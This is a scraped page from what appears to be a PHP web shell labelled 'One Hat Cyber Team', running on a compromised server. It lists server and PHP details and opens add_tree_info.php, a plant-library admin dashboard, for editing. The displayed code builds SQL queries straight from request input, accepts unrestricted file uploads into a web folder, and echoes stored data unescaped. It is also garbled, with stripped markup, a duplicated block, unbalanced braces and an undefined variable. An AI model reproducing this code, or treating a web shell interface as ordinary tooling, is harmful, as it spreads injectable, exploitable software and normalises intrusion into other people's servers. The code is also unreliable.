One Hat Cyber Team

Your IP : 172.69.130.199

Server IP : 188.114.97.4

Server : Linux thuru 6.5.11-4-pve #1 SMP PREEMPT_DYNAMIC PMX 6.5.11-4 (2023-11-20T10:19Z) x86_64

Server Software : Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips

PHP Version : 7.3.33

Buat File | Buat Folder

Dir : ~/home/thuruk/public_html/App/New/admin/dashboard/

Edit File: add_tree_info.php

<?php

session_start();

?>

<?php include('../../connections.php'); ?>

<?php
		$upload_status="";

if(isset($_POST['image_submit'])){
        
            $target_dir = "images/";

$url="";

if(isset($_FILES["image"]["name"])){

$target_file = $target_dir.basename($_FILES["image"]["name"]);

echo $target_file;

move_uploaded_file($_FILES["image"]["tmp_name"], $target_file);

$url = "https://thurukepakaru.com/App/New/admin/dashboard/images/".basename($_FILES["image"]["name"]);

}
            $plant_details_id = str_replace( array("'"), '', $_POST['plant_details_id']);
    
            $query="INSERT INTO `tree_library_images`(`tree_id`, `image_url`) VALUES ('$plant_details_id','$url')";

$result = mysqli_query($connect,$query) or die(mysqli_error($connect));

if($result){

$upload_status="success";

}else{

$upload_status="fail";

}

}else if(isset($_POST['update'])){

$title = $_POST['title'];

$sname =  str_replace( array("'"), '', $_POST['sname']);

$description =mysqli_real_escape_string($connect,$_POST['sinhala_description']);

$english_description = str_replace( array("'"), '', $_POST['english_description']);

$tamil_description = str_replace( array("'"), '', $_POST['tamil_description']);

$plant_details_id = $_POST['plant_details_id'];

$query="UPDATE `plant_details` SET `title`='$title',`sname`='$sname',`description`='$description',`english_description`='$english_description',`tamil_description`='$tamil_description'

WHERE plant_details_id='$plant_details_id'";

$result = mysqli_query($connect,$query) or die(mysqli_error($connect));

if($result){

$upload_status="success";

}else{

$upload_status="fail";

}

if(isset($_POST['submit'])){
        
            $target_dir = "images/";

$url="";

if(isset($_FILES["image"]["name"])){

$target_file = $target_dir.basename($_FILES["image"]["name"]);

echo $target_file;

move_uploaded_file($_FILES["image"]["tmp_name"], $target_file);

$url = "https://thurukepakaru.com/App/New/admin/dashboard/images/".basename($_FILES["image"]["name"]);

}else{

$url ="https://thurukepakaru.com/App/New/admin/dashboard/images/tree.png";

}
     
            $title = $_POST['title'];
      
            $sname =  str_replace( array("#", "'", ";"), '', $_POST['sname']);
     
            $day = $_POST['day'];

$language =mysqli_real_escape_string($connect,$_POST['sinhala_description']);

$english_description = str_replace( array("'"), '', $_POST['english_description']);

$tamil_description = str_replace( array("'"), '', $_POST['tamil_description']);
    
            $query="INSERT INTO `plant_details`(`title`, `sname`, `description`,`english_description`,`tamil_description`,`image`) VALUES ('$title','$sname','$sinhala_description','$english_description','$tamil_description','$url')";

$result = mysqli_query($connect,$query) or die(mysqli_error($connect));

if($result){

$upload_status="success";

}else{

$upload_status="fail";

}

}else if(isset($_POST['update'])){

$title = $_POST['title'];

$sname =  str_replace( array("'"), '', $_POST['sname']);

$description =mysqli_real_escape_string($connect,$_POST['sinhala_description']);

$english_description = str_replace( array("'"), '', $_POST['english_description']);

$tamil_description = str_replace( array("'"), '', $_POST['tamil_description']);

$plant_details_id = $_POST['plant_details_id'];

$query="UPDATE `plant_details` SET `title`='$title',`sname`='$sname',`description`='$description',`english_description`='$english_description',`tamil_description`='$tamil_description'

WHERE plant_details_id='$plant_details_id'";

$result = mysqli_query($connect,$query) or die(mysqli_error($connect));

if($result){

$upload_status="success";

}else{

$upload_status="fail";

}

}else if(isset($_GET['id'])){

$plant_id = $_GET['id'];

$query="DELETE FROM `plant_details` WHERE plant_details_id='$plant_id'";

$result = mysqli_query($connect,$query) or die(mysqli_error($connect));

if($result){

$upload_status="success";

}else{

$upload_status="fail";

}

?>

<!DOCTYPE html>

<head>

<title>Thuru</title>

<style>

.inline{

display: inline-block;

float: right;

margin: 20px 0px;

}

input,button{

height: 34px;

}

</style>

</head>

<body>

<?php include('header.php');?>

<?php include('side_bar.php');?>

<?php

if($upload_status=="success"){

echo '<div class="alert alert-success">

<strong>Success!</strong> Successfully Uploaded

</div>';

}else if( $upload_status=="fail"){

echo '<div class="alert alert-danger">

<strong>False!</strong>Try Again Later</div>';

}/**/

$upload_status="";

?>

<h4 class="card-title">Add Tree Info Images</h4>

</div>

<label class="pb-1">
 
                 Title

</label>
   
               <!--  <input type="text" class="form-control"  name="title" placeholder="Title" required/>

<option>Select Name</option>

<?php

$query="SELECT * FROM `plant_details` ORDER BY plant_details_id DESC";

$result = mysqli_query($connect,$query);

while($row = mysqli_fetch_assoc($result)){

echo ' <option value='.$row['plant_details_id'].'>'.$row['sname'].'</option>';

}

?>

</select>

</div>

Image
                     <star class="star">*</star>

</label>

</div>

<star class="star">*</star> Required fields</div>

</div>

<button type="submit" name="image_submit" class="btn btn-info btn-fill pull-right" id="button">SUBMIT</button>

</div>

</div>

</form>

</div>

Title

</label>

<!--  <input type="text" class="form-control"  name="title" placeholder="Title" required/>

<option>Select Tile</option>

<?php

$query ="SELECT * FROM `tree_name`";

$result = mysqli_query($connect,$query);

while($row = mysqli_fetch_assoc($result)){

echo ' <option>'.$row['name'].'</option>';

}

?>

</select>

</div>

Scientific Name

</label>

</div>

Sinhala   Description

</label>

</div>

English   Description

</label>

</div>

Tamil    Description

</label>

</div>

Image

</label>

</div>

<star class="star">*</star> Required fields</div>

</div>

<button type="submit" name="submit" class="btn btn-info btn-fill pull-right" id="button">SUBMIT</button>

</div>

</div>

</form>

</div>

</div>

<thead>

<th data-field="name" data-sortable="true">Title</th>

<th data-field="scientific" data-sortable="true">Scientific Name</th>

<th data-field="des" data-sortable="true">Description</th>

<th data-field="des1" data-sortable="true">English Description</th>

<th data-field="des212" data-sortable="true">Tamil Description</th>

<th data-field="a" data-sortable="true">Image</th>

<th data-field="action" data-sortable="true">Action</th>

</thead>

<tbody>

<?php

//LIMIT 10

//$query="SELECT * FROM `users` inner join `newuser_plants` WHERE users.user_id=newuser_plants.user_id  ORDER BY newuser_plants.created_time DESC ";

$query="SELECT * FROM `plant_details` ORDER BY plant_details_id DESC";

$result = mysqli_query($connect,$query) or die(mysqli_error($connect));

$i;

while($row=mysqli_fetch_assoc($result)){

$id = $row['plant_details_id'];

$i++;

echo ' <tr>

<td>'.$row['title'].'</td>

<td>'.$row['sname'].'</td>

<td>'.$row['description'].'</td>

<td>'.$row['english_description'].'</td>

<td>'.$row['tamil_description'].'</td>

<td>

</td>

</tr>

<button type="button" class="close" data-dismiss="modal">&times;</button>

</div>

<h4 class="modal-title">  Update </h4>

<div>

<p>Plant Name</p>

<p>Descripion</p>

<p>Sinhala Description</p>

<textarea class="form-control" name="sinhala_description" row="5" placeholder="Description"

>

'.$row['description'].'</textarea>

<p>English Description</p>

'.$row['english_description'].'

</textarea>

<p>Tamil Description</p>

'.$row['tamil_description'].'</textarea>

<br>

<button class="btn btn-info " name="update">UPDATE</button>

</div>

</form>

</div>

';

}

?>

</tbody>

</table>

</div>

tinymce.init({

selector: 'textarea',

plugins: 'advlist autolink lists link image charmap print preview hr anchor pagebreak',

toolbar_mode: 'floating',

});

</script>

<nav>

©

document.write(new Date().getFullYear())

</script>

<a href="https://inoxzasolutions.com/">Inoxza Solutions</a>Innovations Forever

</p>

</nav>

</div>

</footer>

</div>

</body>

$(function() {

$(document).on({

mouseover: function(event) {

$(this).find('.far').addClass('star-over');

$(this).prevAll().find('.far').addClass('star-over');

},

mouseleave: function(event) {

$(this).find('.far').removeClass('star-over');

$(this).prevAll().find('.far').removeClass('star-over');

}

}, '.rate');

$(document).on('click', '.rate', function() {

if ( !$(this).find('.star').hasClass('rate-active') ) {

$(this).siblings().find('.star').addClass('far').removeClass('fas rate-active');

$(this).find('.star').addClass('rate-active fas').removeClass('far star-over');

$(this).prevAll().find('.star').addClass('fas').removeClass('far star-over');

} else {

console.log('has');

}

});

</script>

function showOtherNmae(value){

if(value =="Other"){

document.getElementById('plantName').style.display = 'block';

}else{

document.getElementById('plantName').style.display = 'none';

}

function validateMobileNumber(mobile_number){

$.ajax({url: "validate_user.php", data:{mobile_number:mobile_number},method:"POST",success: function(result){

if(result == 0){

document.getElementById("validationMessage").innerHTML="Mobile Number are Available";

document.getElementById('validationMessage').style.color = 'green';

document.getElementById("button").disabled = false;

}else{

document.getElementById("validationMessage").innerHTML="Mobile Number are not Available";

document.getElementById('validationMessage').style.color = 'red';

document.getElementById("button").disabled = true;

}

}});

}

function setFormValidation(id) {

$(id).validate({

highlight: function(element) {

$(element).closest('.form-group').removeClass('has-success').addClass('has-error');

$(element).closest('.form-check').removeClass('has-success').addClass('has-error');

},

success: function(element) {

$(element).closest('.form-group').removeClass('has-error').addClass('has-success');

$(element).closest('.form-check').removeClass('has-error').addClass('has-success');

},

errorPlacement: function(error, element) {

$(element).closest('.form-group').append(error).addClass('has-error');

},

});

}

$(document).ready(function() {

document.getElementById("otherName").disabled = true;

setFormValidation('#RegisterValidation');

});

</script>

var $table = $('#bootstrap-table');

$table.bootstrapTable({

toolbar: ".toolbar",

clickToSelect: true,

showRefresh: true,

search: true,

showToggle: true,

showColumns: true,

pagination: true,

searchAlign: 'left',

pageSize: 8,

clickToSelect: false,

pageList: [8, 10, 25, 50, 100],

formatShowingRows: function(pageFrom, pageTo, totalRows) {

//do nothing here, we don't want to show the text "showing x of y from..."

},

formatRecordsPerPage: function(pageNumber) {

return pageNumber + " rows visible";

},

icons: {

refresh: 'fa fa-refresh',

toggle: 'fa fa-th-list',

columns: 'fa fa-columns',

detailOpen: 'fa fa-plus-circle',

detailClose: 'fa fa-minus-circle'

}

});

//activate the tooltips after the data table is initialized

$('[rel="tooltip"]').tooltip();

$(window).resize(function() {

$table.bootstrapTable('resetView');

});

</script>

$('.datepicker').datetimepicker({

format: 'YYYY-MM-DD',

icons: {

time: "fa fa-clock-o",

date: "fa fa-calendar",

up: "fa fa-chevron-up",

down: "fa fa-chevron-down",

previous: 'fa fa-chevron-left',

next: 'fa fa-chevron-right',

today: 'fa fa-screenshot',

clear: 'fa fa-trash',

close: 'fa fa-remove'

}

});

</script>

</html>